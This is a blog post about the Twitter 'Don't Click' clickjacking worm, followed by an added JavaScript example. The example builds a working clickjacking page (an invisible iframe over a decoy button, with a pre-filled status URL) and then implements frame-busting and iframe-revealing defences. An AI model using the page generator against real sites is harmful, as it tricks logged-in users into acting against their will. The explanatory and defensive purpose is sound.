
haha, I saw something quite cool and possibly scary today.
One of the people I follow had a tiny URL with the message "don't click", so, of course, I clicked it and was presented with a blank page containing one button. Of course, I clicked that button too, but nothing happened... until I saw people replying to me saying "no I didn't". Turns out that when I clicked the button, I was actually sending the link to my own public timeline!! How? Well, some French guy made a post about how to automatically send a tweet acting as the person who clicks a button, by using an iframe and some simple CSS. I don't know if he was the first Twitter jacker, but I'm sure he won't be the last!
It's something that is spreading around Twitter. As I type this, "Don't Click" is a trending topic on Twitter search...

The button labeled "don't click this" was actually the update button from Twitter's own home page, loaded in an invisible frame on top of the decoy. You can't see the rest of the Twitter page, but when you click (well, most people would!), you are actually clicking Twitter's update button.
The message is added by URL-encoding it onto the end of the Twitter home page URL, like this:
http://twitter.com/home?status=
and the URL-encoded message (spaces become + and other special characters become their %XX hex equivalents) goes after the equals sign:
I+luv+the+commentluv+plugin%21
As long as you're logged in to Twitter, opening this link pre-fills your own update field with a message of my choosing. Nothing is posted until the update button is pressed, and that press is exactly what the hidden-button trick tricks you into providing, with your own session. If I used HTML to insert an iframe into a page with a button I made, all I would have to do is set the opacity of the iframe to 0 and position it so that Twitter's update button sits (invisibly) over the button I put on the page. (Don't worry, I didn't do any shenanigans with the link above.)
I did a quick bash-up of some HTML (lol, no JavaScript needed) to see if I could do it and, well, it's a piece of piss really. I decided not to show it to you as a working example because I am pretty sure that Twitter's T.o.S. doesn't like anything to do with posting on someone's behalf by misleading them (impersonation violation?).
You can read some ways to prevent this from being used against you in this rather fine post.
Another way to detect it is to have a script that faintly outlines any iframes on the page, so you can see if there's doin's goin' on! I think I smell tomorrow's project!
(Either that, or petition Twitter to put a frame-breaking script on any page that has a text input and an update button on it.)
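To make the mechanics concrete, here is an added example (mine, not code from the original post or from the French post it mentions). It builds the kind of page described above, a visible decoy button with the target's own update form floated over it at opacity 0, and implements the two defences floated at the end: a frame-buster, and a script that outlines (and un-hides) every iframe on a page. The target URL, message text, button offsets and element layout are all assumptions; the stand-alone run uses stub window and document objects so it works under Node without a browser.

```javascript
// Added example, not code from the original post: the shape of a "Don't
// Click" page as the post describes it, plus the two client-side checks it
// suggests. The target URL, message, button geometry and ids are hypothetical.

// Form-encode the status message: spaces become "+", other unsafe characters
// become %XX hex escapes ("I luv ... plugin!" -> "status=I+luv+...+plugin%21").
function encodeStatus(message) {
  return new URLSearchParams({ status: message }).toString();
}

// Pre-filled update URL. The victim's browser sends its own session cookie,
// so the target page renders with the attacker's text already in the box.
function statusUrl(base, message) {
  return `${base}?${encodeStatus(message)}`;
}

// The attacker's page. No JavaScript is needed on it: the target is loaded in
// an iframe with opacity 0 and shifted so its update button lands exactly on
// top of the visible decoy button. `buttonOffset` is the (assumed) position
// of the update button inside the target page.
function clickjackPage(targetUrl, decoyLabel, buttonOffset) {
  const decoyTop = 100, decoyLeft = 100;
  return [
    "<!doctype html>",
    "<html><body>",
    `<button style="position:absolute;top:${decoyTop}px;left:${decoyLeft}px">${decoyLabel}</button>`,
    `<iframe src="${targetUrl}" scrolling="no" style="position:absolute;` +
      `top:${decoyTop - buttonOffset.top}px;left:${decoyLeft - buttonOffset.left}px;` +
      `width:1024px;height:768px;opacity:0;z-index:10;border:0"></iframe>`,
    "</body></html>",
  ].join("\n");
}

// Defence 1: frame-busting. A page that must never be framed checks whether
// it is the top-level window and, if not, breaks out. `win` is a parameter
// (rather than the global `window`) so the check can run outside a browser.
function isFramed(win) {
  return win.top !== win.self;
}

function bustFrame(win) {
  if (!isFramed(win)) return false;
  win.top.location = win.self.location; // replace the framing page with ourselves
  return true;
}

// Defence 2 (the post's "outline every iframe" idea): draw a border around
// each iframe and force a near-invisible one to become visible. `getStyle`
// defaults to the browser's getComputedStyle; a stub is passed in tests.
// Returns the src of every frame that was hidden.
function revealFrames(doc, getStyle = globalThis.getComputedStyle) {
  const revealed = [];
  for (const frame of doc.querySelectorAll("iframe")) {
    frame.style.outline = "2px dashed red";
    if (parseFloat(getStyle(frame).opacity) < 0.1) {
      frame.style.opacity = "0.5";
      revealed.push(frame.src);
    }
  }
  return revealed;
}

// Stand-alone run in Node: print the generated attack page and exercise the
// two checks against stub window/document objects (constructed here).
if (typeof window === "undefined") {
  const url = statusUrl("http://target.example/home", "I luv the commentluv plugin!");
  console.log(clickjackPage(url, "don't click this", { top: 180, left: 320 }));

  const topWin = {};
  const framed = { top: topWin, self: { location: "http://target.example/home" } };
  console.log("busted:", bustFrame(framed), "->", topWin.location);

  const hidden = { src: url, style: { opacity: "0" } };
  const doc = { querySelectorAll: () => [hidden] };
  console.log("revealed:", revealFrames(doc, (f) => f.style));
}
```

One caveat worth knowing before relying on the frame-buster: a script-only check can be defeated by the framing page (for example by loading the target in a sandboxed iframe that is not allowed to navigate the top window), so the real fix belongs on the server side, where the X-Frame-Options response header (and later the Content-Security-Policy frame-ancestors directive) tells the browser not to render the page in a frame at all. The outlining script is a detection aid for the user, not a fix for the site being framed.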